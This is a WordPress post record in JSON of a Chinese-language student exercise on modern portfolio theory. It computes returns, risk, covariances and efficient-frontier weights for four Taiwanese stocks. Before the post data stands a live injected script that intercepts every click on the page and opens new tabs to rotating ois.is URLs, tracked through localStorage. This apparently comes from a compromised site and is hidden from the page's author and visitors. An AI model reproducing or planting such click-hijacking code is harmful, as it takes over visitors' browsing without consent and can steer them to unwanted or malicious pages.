<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":1055,"date":"2023-05-11T02:52:22","date_gmt":"2023-05-10T18:52:22","guid":{"rendered":"https:\/\/edu.secda.info\/scu8154204\/?p=1055"},"modified":"2023-05-11T02:54:23","modified_gmt":"2023-05-10T18:54:23","slug":"%e6%8a%95%e8%b3%87%e6%a9%9f%e6%9c%83%e9%9b%86%e5%90%88-%e5%af%a6%e4%bd%9c","status":"publish","type":"post","link":"https:\/\/edu.secda.info\/scu8154204\/?p=1055","title":{"rendered":"\u6295\u8cc7\u6a5f\u6703\u96c6\u5408 \u5be6\u4f5c"},"content":{"rendered":"<p>\u6b64\u6b21\u6311\u9078\u4e863023\u4fe1\u90a6\u30012884\u7389\u5c71\u91d1\u30011414\u6771\u548c\u4ee5\u53ca2454\u806f\u767c\u79d1\u7b49\u56db\u652f\u570b\u5167\u4e0a\u5e02\u80a1\u7968\uff0c\u5176\u5206\u5225\u662f\u96fb\u5b50\u96f6\u7d44\u4ef6\u5927\u5ee0\u3001\u91d1\u878d\u63a7\u80a1\u516c\u53f8\u3001\u50b3\u7522\u7d21\u7e54\u696d\u548c\u5168\u7403\u9818\u5148\u7684\u534a\u5c0e\u9ad4IC\u8a2d\u8a08\u516c\u53f8\u3002\u7814\u7a76\u5340\u9593\u5f9e2021\/02\/02\u81f32023\/03\/01\uff0c\u5171501\u500b\u4ea4\u6613\u65e5\u7684\u65e5\u6536\u76e4\u50f9\uff0c\u8a08\u7b97\u51fa\u5176\u65e5\u5831\u916c\u7387\u3002<\/p>\n<table width=\"502\">\n<tbody>\n<tr>\n<td width=\"86\">rate of return<\/td>\n<td width=\"154\">\u4fe1\u90a6<\/p>\n<p>0.05091%<\/td>\n<td width=\"86\">\u7389\u5c71\u91d1<\/p>\n<p>0.01274%<\/td>\n<td width=\"86\">\u6771\u548c<\/p>\n<p>0.10001%<\/td>\n<td width=\"90\">\u806f\u767c\u79d1<\/p>\n<p>0.00063%<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table width=\"502\">\n<tbody>\n<tr>\n<td width=\"86\">SD<\/td>\n<td width=\"154\">2.22949%<\/td>\n<td width=\"86\">1.18105%<\/td>\n<td width=\"86\">2.63591%<\/td>\n<td width=\"90\">2.57338%<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u4ee5\u4e0a\u662f\u56db\u652f\u80a1\u7968\u6240\u8a08\u7b97\u51fa\u7684\u5e73\u5747\u5831\u916c\u7387\u548c\u6a19\u6e96\u5dee(\u98a8\u96aa)\uff0c\u53ef\u4ee5\u770b\u5230\u6771\u548c\u6709\u6700\u5927\u7684\u5e73\u5747\u5831\u916c\uff0c\u4f46\u5176\u98a8\u96aa\u503c\u4ea6\u5927\uff0c\u800c\u806f\u767c\u79d1\u7684\u5831\u916c\u6700\u5c0f\u537b\u4e5f\u6709\u8f03\u5927\u7684\u98a8\u96aa\uff0c\u4fe1\u90a6\u5728\u9019\u4e4b\u4e2d\u7684\u5247\u6709\u8f03\u5e73\u8861\u7684\u5831\u916c\u7387-\u6a19\u6e96\u5dee\uff1b\u7389\u5c71\u91d1\u5c31\u5982\u8a31\u591a\u5b58\u80a1\u65cf\u7684\u4fdd\u5b88\u9078\u80a1\u6a19\u7684\uff0c\u6709\u6700\u5c0f\u7684\u6ce2\u52d5(\u98a8\u96aa)\uff0c\u4f46\u5176\u5831\u916c\u4ea6\u504f\u5c0f\u3002<\/p>\n<p>\u4ee5\u4e0b\u662f\u56db\u652f\u80a1\u7968\u7684\u5171\u8b8a\u7570\u6578\u77e9\u9663\u548c\u5176\u76f8\u95dc\u4fc2\u6578:<\/p>\n<table width=\"502\">\n<tbody>\n<tr>\n<td width=\"86\">Cov<\/td>\n<td width=\"154\">\u4fe1\u90a6<\/td>\n<td width=\"86\">\u7389\u5c71\u91d1<\/td>\n<td width=\"86\">\u6771\u548c<\/td>\n<td width=\"90\">\u806f\u767c\u79d1<\/td>\n<\/tr>\n<tr>\n<td>\u4fe1\u90a6<\/td>\n<td>0.000497063<\/td>\n<td><\/td>\n<td><\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>\u7389\u5c71\u91d1<\/td>\n<td>5.36411E-05<\/td>\n<td>0.000139488<\/td>\n<td><\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>\u6771\u548c<\/td>\n<td>0.000114776<\/td>\n<td>4.74834E-05<\/td>\n<td>0.000694804<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>\u806f\u767c\u79d1<\/td>\n<td>0.000166199<\/td>\n<td>8.23828E-05<\/td>\n<td>9.50466E-05<\/td>\n<td>0.000662229<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td><\/td>\n<td><\/td>\n<td><\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>Correlation<\/td>\n<td>\u4fe1\u90a6<\/td>\n<td>\u7389\u5c71\u91d1<\/td>\n<td>\u6771\u548c<\/td>\n<td>\u806f\u767c\u79d1<\/td>\n<\/tr>\n<tr>\n<td>\u4fe1\u90a6<\/td>\n<td>1<\/td>\n<td><\/td>\n<td><\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>\u7389\u5c71\u91d1<\/td>\n<td>0.203715448<\/td>\n<td>1<\/td>\n<td><\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>\u6771\u548c<\/td>\n<td>0.195306033<\/td>\n<td>0.152525647<\/td>\n<td>1<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>\u806f\u767c\u79d1<\/td>\n<td>0.289679386<\/td>\n<td>0.271059303<\/td>\n<td>0.140120379<\/td>\n<td>1<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table width=\"631\">\n<tbody>\n<tr>\n<td width=\"131\"><\/td>\n<td width=\"137\"><\/td>\n<td width=\"117\"><\/td>\n<td width=\"82\"><\/td>\n<td width=\"82\"><\/td>\n<td width=\"82\">\u5831\u916c<\/td>\n<\/tr>\n<tr>\n<td>MIN<\/td>\n<td>0<\/td>\n<td>0<\/td>\n<td>0<\/td>\n<td>1<\/td>\n<td>0.000627%<\/td>\n<\/tr>\n<tr>\n<td>MAX<\/td>\n<td>0<\/td>\n<td>0<\/td>\n<td>1<\/td>\n<td>0<\/td>\n<td>0.100005%<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td>0<\/td>\n<td>1<\/td>\n<td>0<\/td>\n<td>0<\/td>\n<td>0.012738%<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td>1<\/td>\n<td>0<\/td>\n<td>0<\/td>\n<td>0<\/td>\n<td>0.050912%<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u70ba\u8a08\u7b97\u51fa\u6b64\u6295\u8cc7\u7d44\u5408\u7684\u6700\u5927\/\u6700\u5c0f\u5831\u916c\uff0c\u6211\u5206\u5225\u4ee5\u5168\u90e8\u6301\u80a1\u6b0a\u91cd\u90fd\u6301\u6709\u5176\u4e2d\u55ae\u4e00\u80a1\u7968\uff0c\u5f97\u51fa\u6700\u5927\u5831\u916c\u662f\u5168\u90e8\u6301\u6709\u6771\u548c\uff1b\u6700\u5c0f\u5831\u916c\u5247\u662f\u5168\u90e8\u6301\u6709\u806f\u767c\u79d1\u3002<\/p>\n<p>\u4e0b\u5716\u4ee5\u6700\u5927\/\u6700\u5c0f\u5831\u916c\uff0c\u4e2d\u9593\u5207\u5206\uff0c\u517120\u500b\u5831\u916c\u7387\uff0c\u518d\u4ee5\u898f\u5283\u6c42\u89e3\u627e\u51fa\u5728\u6b6420\u500b\u5831\u916c\u7387\u4e0b\uff0c\u6700\u5c0f\u98a8\u96aa\u7684\u500b\u5225\u6b0a\u91cd\u3002\u800c\u6b64\u6b0a\u91cd\u7684\u9650\u5236\u70ba0\u52301\u4e4b\u9593\uff0c\u610f\u5373\u53ea\u80fd\u9078\u64c7\u4e0d\u6301\u80a1\u6216\u8cb7\u9032\u6301\u80a1\uff0c\u800c\u7121\u6cd5\u505a\u7a7a<\/p>\n<table width=\"689\">\n<tbody>\n<tr>\n<td width=\"58\"><\/td>\n<td width=\"131\">\u6295\u8cc7\u7d44\u5408\u7684\u98a8\u96aa<\/td>\n<td width=\"137\">\u6295\u8cc7\u7d44\u5408\u7684\u5831\u916c\u7387<\/td>\n<td width=\"117\">\u4fe1\u90a6<\/td>\n<td width=\"82\">\u7389\u5c71\u91d1<\/td>\n<td width=\"82\">\u6771\u548c<\/td>\n<td width=\"82\">\u806f\u767c\u79d1<\/td>\n<\/tr>\n<tr>\n<td>1<\/td>\n<td>0.026359127<\/td>\n<td>0.1000052%<\/td>\n<td>0<\/td>\n<td>0<\/td>\n<td>1<\/td>\n<td>0<\/td>\n<\/tr>\n<tr>\n<td>2<\/td>\n<td>0.024127448<\/td>\n<td>0.000947747<\/td>\n<td>0.106541965<\/td>\n<td>0<\/td>\n<td>0.893459035<\/td>\n<td>0<\/td>\n<\/tr>\n<tr>\n<td>3<\/td>\n<td>0.02226088<\/td>\n<td>0.000898196<\/td>\n<td>0.207472518<\/td>\n<td>0<\/td>\n<td>0.792527482<\/td>\n<td>0<\/td>\n<\/tr>\n<tr>\n<td>4<\/td>\n<td>0.02077502<\/td>\n<td>0.000851252<\/td>\n<td>0.303094683<\/td>\n<td>0<\/td>\n<td>0.696905319<\/td>\n<td>0<\/td>\n<\/tr>\n<tr>\n<td>5<\/td>\n<td>0.019626723<\/td>\n<td>0.00080678<\/td>\n<td>0.331911368<\/td>\n<td>0.034749403<\/td>\n<td>0.633339229<\/td>\n<td>0<\/td>\n<\/tr>\n<tr>\n<td>6<\/td>\n<td>0.018589469<\/td>\n<td>0.000764648<\/td>\n<td>0.316596699<\/td>\n<td>0.091644555<\/td>\n<td>0.591758744<\/td>\n<td>0<\/td>\n<\/tr>\n<tr>\n<td>7<\/td>\n<td>0.017634109<\/td>\n<td>0.000724733<\/td>\n<td>0.302088083<\/td>\n<td>0.145545217<\/td>\n<td>0.552366699<\/td>\n<td>0<\/td>\n<\/tr>\n<tr>\n<td>8<\/td>\n<td>0.016757734<\/td>\n<td>0.000686919<\/td>\n<td>0.288343044<\/td>\n<td>0.196609023<\/td>\n<td>0.515047934<\/td>\n<td>0<\/td>\n<\/tr>\n<tr>\n<td>9<\/td>\n<td>0.015957496<\/td>\n<td>0.000651095<\/td>\n<td>0.275321487<\/td>\n<td>0.244985224<\/td>\n<td>0.47969329<\/td>\n<td>0<\/td>\n<\/tr>\n<tr>\n<td>10<\/td>\n<td>0.015230568<\/td>\n<td>0.000617157<\/td>\n<td>0.262985214<\/td>\n<td>0.290815344<\/td>\n<td>0.446199442<\/td>\n<td>0<\/td>\n<\/tr>\n<tr>\n<td>11<\/td>\n<td>0.014574092<\/td>\n<td>0.000585005<\/td>\n<td>0.251298251<\/td>\n<td>0.334233332<\/td>\n<td>0.414468415<\/td>\n<td>0<\/td>\n<\/tr>\n<tr>\n<td>12<\/td>\n<td>0.01398514<\/td>\n<td>0.000554546<\/td>\n<td>0.240226386<\/td>\n<td>0.375366168<\/td>\n<td>0.384407444<\/td>\n<td>0<\/td>\n<\/tr>\n<tr>\n<td>13<\/td>\n<td>0.013460673<\/td>\n<td>0.000525689<\/td>\n<td>0.229737231<\/td>\n<td>0.414334131<\/td>\n<td>0.355928637<\/td>\n<td>0<\/td>\n<\/tr>\n<tr>\n<td>14<\/td>\n<td>0.012997504<\/td>\n<td>0.000498351<\/td>\n<td>0.219799982<\/td>\n<td>0.451251837<\/td>\n<td>0.328948181<\/td>\n<td>0<\/td>\n<\/tr>\n<tr>\n<td>15<\/td>\n<td>0.012592326<\/td>\n<td>0.047245213%<\/td>\n<td>0.2103861<\/td>\n<td>0.486225133<\/td>\n<td>0.303388767<\/td>\n<td>0<\/td>\n<\/tr>\n<tr>\n<td>16<\/td>\n<td>0.012241623<\/td>\n<td>0.044791623%<\/td>\n<td>0.201467494<\/td>\n<td>0.519358408<\/td>\n<td>0.279174098<\/td>\n<td>0<\/td>\n<\/tr>\n<tr>\n<td>17<\/td>\n<td>0.011941763<\/td>\n<td>0.042467169%<\/td>\n<td>0.193018146<\/td>\n<td>0.550748419<\/td>\n<td>0.256233435<\/td>\n<td>0<\/td>\n<\/tr>\n<tr>\n<td>18<\/td>\n<td>0.011689012<\/td>\n<td>0.040265055%<\/td>\n<td>0.185013808<\/td>\n<td>0.580485153<\/td>\n<td>0.234501039<\/td>\n<td>0<\/td>\n<\/tr>\n<tr>\n<td>19<\/td>\n<td>0.01147953<\/td>\n<td>0.03817884%<\/td>\n<td>0.177430586<\/td>\n<td>0.608657372<\/td>\n<td>0.213912041<\/td>\n<td>0<\/td>\n<\/tr>\n<tr>\n<td>20<\/td>\n<td>0.025733807<\/td>\n<td>0.0006270%<\/td>\n<td>0<\/td>\n<td>0<\/td>\n<td>0<\/td>\n<td>1<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone wp-image-1058\" src=\"https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/05\/\u87a2\u5e55\u64f7\u53d6\u756b\u9762-2023-05-10-213521-300x175.png\" alt=\"\" width=\"601\" height=\"351\" srcset=\"https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/05\/\u87a2\u5e55\u64f7\u53d6\u756b\u9762-2023-05-10-213521-300x175.png 300w, https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/05\/\u87a2\u5e55\u64f7\u53d6\u756b\u9762-2023-05-10-213521.png 710w\" sizes=\"(max-width: 601px) 100vw, 601px\" \/><\/p>\n<p>\u4e0a\u5716\u6295\u8cc7\u6a5f\u6703\u96c6\u5408\u8ecc\u8de1\uff0c\u5373\u662f\u4ee5\u4e0a\u976220\u500b\u9ede\u6240\u5f97\u51fa\uff0c\u6a6b\u8ef8(X\u8ef8)\u70ba\u98a8\u96aa\uff0c\u7e31\u8ef8(Y\u8ef8)\u70ba\u5831\u916c\u7387\u3002<\/p>\n<p>\u5728\u56fa\u5b9a\u76f8\u540c\u7684\u5831\u916c\u7387\u4e0b\uff0c\u627e\u5230\u6700\u5c0f\u7684\u98a8\u96aa\uff0c\u56e0\u6b64\u5728\u85cd\u8272\u8ecc\u8de1IOS\u7684\u53f3\u5074\u548c\u4e0b\u534a\u90e8\u662f\u88ab\u652f\u914d\u7684(\u975e\u6700\u4f73)\uff0c\u800c\u8ecc\u8de1\u5de6\u5074\u5247\u662f\u7121\u6cd5\u9054\u5230(\u4e0d\u53ef\u53ca)\u7684\u3002<\/p>\n<p>\u5728\u6240\u6709\u7d44\u5408\u4e2d\uff0c\u6709\u6700\u5c0f\u98a8\u96aa\u7684\u4f4d\u7f6e\u6703\u5728\u6b64\u5713\u5f27\u8ecc\u8de1\u7684\u5de6\u7aef\u9ede\uff0c\u6b64\u9ede\u53c8\u7a31\u70ba\u6700\u5c0f\u8b8a\u7570\u6295\u7d44-MVP\uff0c\u4ee5\u6b64\u9ede\u70ba\u8d77\u9ede\u5f80\u4e0a\u624d\u662f\u6709\u6548\u7387\u6700\u4f73\u7684\u6295\u8cc7\u7d44\u5408\uff0c\u5373\u6548\u7387\u524d\u7de3\u3002<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone wp-image-1059\" src=\"https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/05\/\u87a2\u5e55\u64f7\u53d6\u756b\u9762-2023-05-10-220104-300x267.png\" alt=\"\" width=\"353\" height=\"314\" srcset=\"https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/05\/\u87a2\u5e55\u64f7\u53d6\u756b\u9762-2023-05-10-220104-300x267.png 300w, https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/05\/\u87a2\u5e55\u64f7\u53d6\u756b\u9762-2023-05-10-220104-800x712.png 800w, https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/05\/\u87a2\u5e55\u64f7\u53d6\u756b\u9762-2023-05-10-220104-768x684.png 768w, https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/05\/\u87a2\u5e55\u64f7\u53d6\u756b\u9762-2023-05-10-220104.png 1000w\" sizes=\"(max-width: 353px) 100vw, 353px\" \/><\/p>\n<p>\u8cc7\u6599\u4f86\u6e90: <a href=\"https:\/\/thismatter.com\/money\/investments\/modern-portfolio-theory.htm\">https:\/\/thismatter.com\/money\/investments\/modern-portfolio-theory.htm<\/a><\/p>\n<p>\u4e0a\u5716\u5373\u70ba\u7406\u8ad6\u64cd\u4f5c\uff0c\u5728Efficient Frontier\u4e0a\u662f\u6240\u6709\u7684\u6700\u4f73\u6295\u8cc7\u7d44\u5408\uff0c\u800c\u5728\u6b64\u6548\u7387\u524d\u7de3\u4e0a\uff0c\u64c1\u6709\u6700\u9ad8\u590f\u666e\u6bd4\u7387Sharpe ratio\u7684\u6700\u4f73\u6295\u7d44\uff0c\u7a31\u70ba\u5e02\u5834\u6295\u8cc7\u7d44\u5408(market portfolio)\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u6b64\u6b21\u6311\u9078\u4e863023\u4fe1\u90a6\u30012884\u7389\u5c71\u91d1\u30011414\u6771\u548c\u4ee5\u53ca2454\u806f\u767c\u79d1\u7b49\u56db\u652f\u570b\u5167<\/p>\n","protected":false},"author":15,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/posts\/1055"}],"collection":[{"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1055"}],"version-history":[{"count":3,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/posts\/1055\/revisions"}],"predecessor-version":[{"id":1062,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/posts\/1055\/revisions\/1062"}],"wp:attachment":[{"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1055"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1055"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1055"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}